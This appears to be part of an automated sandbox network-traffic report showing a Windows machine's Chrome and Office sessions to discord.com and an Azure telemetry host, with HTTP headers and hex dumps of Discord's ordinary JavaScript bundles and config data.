                                                                                                                                                                                                                                                                                    Data Ascii: 0],[3950847537,3,1,-1,0,1331,0,0],[3927145797,0,1,-1,3,5548,0,0],[2240098025,0,1,-1,0,6369,0,1],[822676134,2,1,-1,0,3514,0,0],[1894288113,0,2,-1,4,8192,0,0],[2538591077,0,1,-1,6,9723,0,0],[2053162821,0,1,-1,1,3559,0,0],[2816577626,0,1,-1,2,5833,0,0],[1580
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 36 31 37 37 2c 30 2c 31 5d 2c 5b 32 34 39 31 39 34 33 34 34 37 2c 30 2c 31 2c 2d 31 2c 30 2c 37 37 32 32 2c 30 2c 31 5d 2c 5b 36 37 33 36 35 37 38 37 32 2c 30 2c 31 2c 2d 31 2c 32 2c 32 32 2c 30 2c 30 5d 2c 5b 33 38 37 32 37 35 37 39 38 2c 32 2c 32 2c 2d 31 2c 30 2c 37 36 35 39 2c 30 2c 31 5d 2c 5b 32 39 37 39 39 32 36 32 34 30 2c 30 2c 31 2c 2d 31 2c 30 2c 37 33 36 33 2c 30 2c 30 5d 2c 5b 34 34 30 39 38 30 34 37 38 2c 34 2c 33 2c 2d 31 2c 30 2c 32 31 35 36 2c 30 2c 31 5d 2c 5b 33 32 39 39 32 35 34 38 34 36 2c 33 2c 32 2c 2d 31 2c 30 2c 32 37 33 37 2c 30 2c 31 5d 2c 5b 31 33 38 34 39 38 38 38 31 38 2c 33 2c 31 2c 2d 31 2c 30 2c 36 32 32 33 2c 30 2c 31 5d 2c 5b 32 31 36 36 35 34 34 37 36 35 2c 30 2c 31 2c 2d 31 2c 30 2c 34 37 35 33 2c 30 2c 30 5d 2c 5b 33
                                                                                                                                                                                                                                                                                    Data Ascii: 6177,0,1],[2491943447,0,1,-1,0,7722,0,1],[673657872,0,1,-1,2,22,0,0],[387275798,2,2,-1,0,7659,0,1],[2979926240,0,1,-1,0,7363,0,0],[440980478,4,3,-1,0,2156,0,1],[3299254846,3,2,-1,0,2737,0,1],[1384988818,3,1,-1,0,6223,0,1],[2166544765,0,1,-1,0,4753,0,0],[3
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 30 2c 38 31 38 36 2c 30 2c 31 5d 2c 5b 31 30 35 36 34 34 34 30 34 39 2c 30 2c 31 2c 2d 31 2c 30 2c 36 32 30 2c 30 2c 30 5d 2c 5b 37 35 38 34 31 33 37 37 32 2c 30 2c 31 2c 2d 31 2c 30 2c 35 30 36 35 2c 30 2c 30 5d 2c 5b 32 39 31 36 39 37 32 32 33 33 2c 34 2c 31 2c 2d 31 2c 30 2c 33 31 36 33 2c 30 2c 31 5d 2c 5b 34 32 38 37 32 38 38 37 37 30 2c 31 2c 31 2c 2d 31 2c 30 2c 37 32 35 33 2c 31 2c 31 5d 2c 5b 32 31 38 36 30 35 34 31 33 33 2c 31 2c 30 2c 2d 31 2c 30 2c 31 30 37 37 2c 31 2c 31 5d 2c 5b 32 38 38 32 36 35 36 39 30 36 2c 32 2c 30 2c 2d 31 2c 30 2c 33 32 35 37 2c 31 2c 31 5d 2c 5b 35 32 39 33 30 36 32 34 30 2c 31 2c 31 2c 2d 31 2c 30 2c 37 33 39 30 2c 31 2c 31 5d 2c 5b 33 30 39 36 33 39 38 31 34 37 2c 31 2c 34 2c 2d 31 2c 30 2c 31 39 39 34 2c 31 2c 31
                                                                                                                                                                                                                                                                                    Data Ascii: 0,8186,0,1],[1056444049,0,1,-1,0,620,0,0],[758413772,0,1,-1,0,5065,0,0],[2916972233,4,1,-1,0,3163,0,1],[4287288770,1,1,-1,0,7253,1,1],[2186054133,1,0,-1,0,1077,1,1],[2882656906,2,0,-1,0,3257,1,1],[529306240,1,1,-1,0,7390,1,1],[3096398147,1,4,-1,0,1994,1,1
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 33 39 37 2c 30 2c 31 2c 2d 31 2c 30 2c 36 30 30 32 2c 30 2c 31 5d 2c 5b 32 37 31 37 36 34 37 39 30 37 2c 33 2c 31 2c 2d 31 2c 30 2c 35 37 32 34 2c 30 2c 31 5d 2c 5b 32 32 38 33 30 36 31 33 37 32 2c 32 2c 31 2c 2d 31 2c 30 2c 33 30 32 30 2c 30 2c 30 5d 2c 5b 31 33 34 35 35 37 34 31 35 31 2c 30 2c 31 2c 2d 31 2c 30 2c 36 36 32 32 2c 30 2c 30 5d 2c 5b 31 37 31 35 32 39 36 31 31 36 2c 31 2c 30 2c 2d 31 2c 30 2c 31 31 36 36 2c 30 2c 31 5d 2c 5b 38 34 32 35 30 31 31 39 37 2c 31 2c 31 2c 2d 31 2c 30 2c 33 33 34 38 2c 31 2c 31 5d 2c 5b 32 37 35 30 34 37 37 32 39 32 2c 33 2c 31 2c 2d 31 2c 30 2c 38 35 36 35 2c 30 2c 30 5d 2c 5b 37 30 34 39 31 34 30 39 39 2c 30 2c 31 2c 2d 31 2c 30 2c 31 37 38 37 2c 30 2c 30 5d 2c 5b 31 38 30 30 32 35 32 38 35 37 2c 30 2c 31 2c 2d
                                                                                                                                                                                                                                                                                    Data Ascii: 397,0,1,-1,0,6002,0,1],[2717647907,3,1,-1,0,5724,0,1],[2283061372,2,1,-1,0,3020,0,0],[1345574151,0,1,-1,0,6622,0,0],[1715296116,1,0,-1,0,1166,0,1],[842501197,1,1,-1,0,3348,1,1],[2750477292,3,1,-1,0,8565,0,0],[704914099,0,1,-1,0,1787,0,0],[1800252857,0,1,-
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 38 2c 5b 22 4d 45 4d 42 45 52 5f 56 45 52 49 46 49 43 41 54 49 4f 4e 5f 4d 41 4e 55 41 4c 5f 41 50 50 52 4f 56 41 4c 22 5d 5d 5d 5d 5d 5d 2c 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 33 30 31 33 37 37 31 38 33 38 2c 5b 5b 33 30 31 33 37 37 31 38 33 38 2c 5b 22 39 39 31 33 36 35 38 36 35 35 33 32 35 37 35 38 34 34 22 2c 22 38 30 39 38 34 36 37 36 38 30 37 34 32 32 37 37 32 33 22 2c 22 31 31 35 30 39 30 36 37 35 36 31 39 37 37 38 35 37 34 31 22 2c 22 38 30 39 38 34 34 33 30 31 33 35 33 33 32 30 35 35 38 22 2c 22 39 39 31 38 30 34 32 35 33 33 33 35 32 31 32 31 31 32 22 2c 22 38 34 30 32 39 36 36 30 37 37 38 35 32 38 37 37 36 33 22 2c 22 36 35 31 35 39 37 35 31 34 34 30 37 30 31 38 35 31 36 22 5d 5d 5d 5d 5d 5d 5d
                                                                                                                                                                                                                                                                                    Data Ascii: 8,["MEMBER_VERIFICATION_MANUAL_APPROVAL"]]]]]],[[[1,[{"s":0,"e":10000}]]],[[3013771838,[[3013771838,["991365865532575844","809846768074227723","1150906756197785741","809844301353320558","991804253335212112","840296607785287763","651597514407018516"]]]]]]]
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 39 39 38 37 32 32 32 32 37 35 36 38 38 35 22 2c 22 34 31 37 37 33 39 32 31 35 33 35 35 35 31 30 37 38 34 22 2c 22 33 37 38 36 36 32 30 37 39 33 36 31 34 34 39 39 39 34 22 2c 22 38 37 37 32 33 39 39 35 33 31 37 34 36 39 31 39 31 30 22 2c 22 31 30 30 39 39 35 35 36 37 32 35 34 36 33 34 35 30 32 31 22 2c 22 31 30 31 31 33 36 31 39 30 36 36 31 36 39 37 39 34 39 36 22 2c 22 39 39 34 37 32 37 30 35 34 31 39 30 38 35 34 33 31 34 22 5d 7d 5d 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 33 35 31 30 38 31 36 33 34 32 2c 6e 75 6c 6c 2c 30 2c 5b 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 5d 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 31 39 39 30 36 37 32 30 30 39 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                    Data Ascii: 99872222756885","417739215355510784","378662079361449994","877239953174691910","1009955672546345021","1011361906616979496","994727054190854314"]}],[],null,null,0,0],[3510816342,null,0,[[[[1,[{"s":0,"e":10000}]]],[]]],[],[],null,null,0,0],[1990672009,null,
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 31 30 30 30 7d 2c 7b 22 73 22 3a 31 30 30 30 2c 22 65 22 3a 32 30 30 30 7d 2c 7b 22 73 22 3a 32 30 30 30 2c 22 65 22 3a 33 30 30 30 7d 2c 7b 22 73 22 3a 33 30 30 30 2c 22 65 22 3a 35 30 30 30 7d 2c 7b 22 73 22 3a 35 30 30 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 7b 22 62 22 3a 31 2c 22 6b 22 3a 5b 22 36 35 31 35 39 35 38 37 35 38 39 37 38 33 35 35 34 30 22 2c 22 31 30 34 35 31 30 39 31 35 33 35 38 32 30 32 32 37 32 37 22 2c 22 31 30 34 37 39 35 33 38 33 30 39 37 39 30 34 37 34 35 35 22 2c 22 38 34 37 36 34 37 33 35 38 33 32 30 36 38 30 39 36 22 5d 7d 5d 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 31 38 30 34 31 32 32 38 32 37 2c 22 32 30 32 32 2d 30 39 5f 67 75 69 6c 64 5f 6f 6e 62 6f 61 72 64 69 6e 67 5f 61 64 6d
                                                                                                                                                                                                                                                                                    Data Ascii: 1000},{"s":1000,"e":2000},{"s":2000,"e":3000},{"s":3000,"e":5000},{"s":5000,"e":10000}]]],[]]],[{"b":1,"k":["651595875897835540","1045109153582022727","1047953830979047455","84764735832068096"]}],[],null,null,0,0],[1804122827,"2022-09_guild_onboarding_adm


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    48192.168.2.549770162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:39 UTC866OUTGET /assets/ac625b77a0bab0ee72df.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: worker
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 3530
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0bebc0e7288-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "be6064ff8c1d480afb80fe48762a06c1"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 28 Jun 2024 00:43:11 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4PAy59xuy6vveAlurMgizaWgOXln08Br%2FkrxAtO9jxIA8k057rLFUxChBv9So6lGIjMptQZNTQ0oApxr8xu2K9persVHGl0YOIgUpIAc1RuBByRRfO2XEfzz6bQy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC405INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 7b 35 30 34 30 35 33 3a 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 65 29 7b 65 2e 64 28 74 2c 7b 46 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 65 28 35 31 38 32 36 33 29 2c 65 28 39 37 30 31 37 33 29 2c 65 28 35 32 30 37 31 32 29 2c 65 28 32 36 38 31 31 31 29 2c 65 28 39 34 31 34 39 37 29 2c 65 28 33 32 30 32 36 29 2c 65 28 34 38 30 38 33 39 29 2c 65 28 37 34 34 32 38 35 29 2c 65 28 34 39 32 32 35 37 29 2c 65 28 38 37 33 38 31 37 29 2c 65 28 38 36 33 39 34 32 29 2c 65 28 36 34 32 35 34 39 29 2c 65 28 36 35 33 30 34 31 29 3b 76 61 72 20 6e 3d 65 28 37 38 38 39 30 30 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 72 29 7b 6c 65 74 20 74 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                    Data Ascii: (()=>{"use strict";var r={504053:function(r,t,e){e.d(t,{F:function(){return o}}),e(518263),e(970173),e(520712),e(268111),e(941497),e(32026),e(480839),e(744285),e(492257),e(873817),e(863942),e(642549),e(653041);var n=e(788900);function o(r){let t=function(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 5b 33 5d 7c 72 5b 34 5d 3c 3c 38 2c 73 3d 28 36 33 26 63 29 2f 36 33 2c 70 3d 28 63 3e 3e 36 26 36 33 29 2f 33 31 2e 35 2d 31 2c 64 3d 28 63 3e 3e 31 32 26 36 33 29 2f 33 31 2e 35 2d 31 2c 76 3d 63 3e 3e 32 33 2c 68 3d 6c 3e 3e 31 35 2c 62 3d 69 28 33 2c 68 3f 76 3f 35 3a 37 3a 37 26 6c 29 2c 67 3d 69 28 33 2c 68 3f 37 26 6c 3a 76 3f 35 3a 37 29 2c 79 3d 76 3f 28 31 35 26 72 5b 35 5d 29 2f 31 35 3a 31 2c 4f 3d 28 72 5b 35 5d 3e 3e 34 29 2f 31 35 2c 6d 3d 76 3f 36 3a 35 2c 77 3d 30 2c 78 3d 28 74 2c 65 2c 6e 29 3d 3e 7b 6c 65 74 20 6f 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 66 6f 72 28 6c 65 74 20 69 3d 66 3f 30 3a 31 3b 69 2a 65 3c 74 2a 28 65 2d 66 29 3b 69 2b 2b 29 6f 2e 70 75 73 68 28 28 28 72 5b 6d 2b 28 77 3e 3e 31 29
                                                                                                                                                                                                                                                                                    Data Ascii: [3]|r[4]<<8,s=(63&c)/63,p=(c>>6&63)/31.5-1,d=(c>>12&63)/31.5-1,v=c>>23,h=l>>15,b=i(3,h?v?5:7:7&l),g=i(3,h?7&l:v?5:7),y=v?(15&r[5])/15:1,O=(r[5]>>4)/15,m=v?6:5,w=0,x=(t,e,n)=>{let o=[];for(let f=0;f<e;f++)for(let i=f?0:1;i*e<t*(e-f);i++)o.push(((r[m+(w>>1)
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 6e 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 29 72 65 74 75 72 6e 20 6f 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 66 3d 74 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 72 5b 6e 5d 2e 63 61 6c 6c 28 66 2e 65 78 70 6f 72 74 73 2c 66 2c 66 2e 65 78 70 6f 72 74 73 2c 65 29 2c 66 2e 65 78 70 6f 72 74 73 7d 65 2e 6d 3d 72 2c 65 2e 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 65 2e 4f 28 76 6f 69 64 20 30 2c 5b 22 37 38 31 38 37 22 2c 22 37 31 39 38 34 22 2c 22 34 33 32 32 32 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 22 31 37 31 37 31 36 22 29 7d 29 3b 72 65 74 75 72 6e 20 72 3d 65 2e 4f 28 72 29 7d 2c 65 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 74 3d 72 26 26 72 2e 5f 5f 65 73 4d
                                                                                                                                                                                                                                                                                    Data Ascii: n];if(void 0!==o)return o.exports;var f=t[n]={exports:{}};return r[n].call(f.exports,f,f.exports,e),f.exports}e.m=r,e.x=function(){var r=e.O(void 0,["78187","71984","43222"],function(){return e("171716")});return r=e.O(r)},e.n=function(r){var t=r&&r.__esM
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC387INData Raw: 39 38 34 22 2c 22 34 33 32 32 32 22 5d 2e 6d 61 70 28 65 2e 65 2c 65 29 29 2e 74 68 65 6e 28 72 29 7d 7d 29 28 29 2c 28 28 29 3d 3e 7b 76 61 72 20 72 3d 7b 37 37 34 35 39 3a 31 7d 3b 65 2e 66 2e 69 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 21 72 5b 74 5d 26 26 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 65 2e 70 2b 65 2e 75 28 74 29 29 7d 3b 76 61 72 20 74 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 2c 6e 3d 74 2e 70 75 73 68 2e 62 69 6e 64 28 74 29 3b 74 2e 70 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6f 3d 74 5b 30 5d 2c 66 3d 74 5b 31 5d 2c 69 3d 74 5b 32 5d 3b 66 6f 72 28 76 61 72 20 75 20 69
                                                                                                                                                                                                                                                                                    Data Ascii: 984","43222"].map(e.e,e)).then(r)}})(),(()=>{var r={77459:1};e.f.i=function(t,n){!r[t]&&importScripts(e.p+e.u(t))};var t=this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[],n=t.push.bind(t);t.push=function(t){var o=t[0],f=t[1],i=t[2];for(var u i


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    49192.168.2.54976813.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:39 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 420
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 81672928-a01e-001e-4184-3b49ef000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201240Z-174c587ffdfn4nhwhC1TEB2nbc00000003k000000000472a
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    50192.168.2.549775162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:39 UTC862OUTGET /assets/1098b8da25f51e58cea4.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC968INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 1116184
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0bf18418cb9-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "6711db79358e775c42b3d16399971300"
                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 23 Nov 2024 00:20:15 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zaqnwn7q8I22OGHhGspmZv1FnAjjjzzjBJ%2BveyOz2MUrmF%2FtDm%2BUDglObpxbVUbNu5lFggaJCwLn8I1%2BljU3torDkV0umOwVDe16nJwh6GtEAbnqf%2FkTh39xKEfS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC401INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 32 37 32 31 22 5d 2c 7b 37 35 36 38 30 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 74 29 7b 74 2e 72 28 6f 29 2c 6f 2e 64 65 66 61 75 6c 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 37 73 46 4e 66 58 22 3a 22 52 65 6d 6f 76 65 20 6d 65 6d 62 65 72 22 2c 22 51 2b 75 44 30 39 22 3a 22 54 68 69 73 20 70 65 72 73 6f 6e 5c 27 73 20 68 69 67 68 65 73 74 20 72 6f 6c 65 20 69 73 20 74 68 65 20 73 61 6d 65 20 61 73 20 79 6f 75 72 73 2c 20 73 6f 20 79 6f 75 20 63 61 6e 6e 6f 74 20 6d 61 6e 61 67 65 20 74 68
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["22721"],{756809:function(e,o,t){t.r(o),o.default=JSON.parse('{"7sFNfX":"Remove member","Q+uD09":"This person\'s highest role is the same as yours, so you cannot manage th
